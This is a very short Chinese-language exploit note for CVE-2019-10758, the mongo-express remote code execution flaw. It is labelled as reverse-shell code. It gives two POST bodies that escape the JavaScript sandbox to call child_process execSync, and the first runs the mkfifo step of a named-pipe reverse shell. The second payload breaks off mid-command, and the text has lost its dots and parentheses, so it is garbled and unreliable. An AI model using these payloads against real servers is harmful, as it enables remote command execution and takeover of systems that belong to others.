CVE-2019-10758
CVE-2019-10758 mongo-express远程代码执行,反弹shell代码如下: POST BODY 1: document=thisconstructorconstructor("return process")()mainModulerequire("child_process")execSync("mkfifo /tmp/f") POST BODY 2: document=thisconstructorconstructor("return process")()mainModulerequire("child_process")execSync(&qu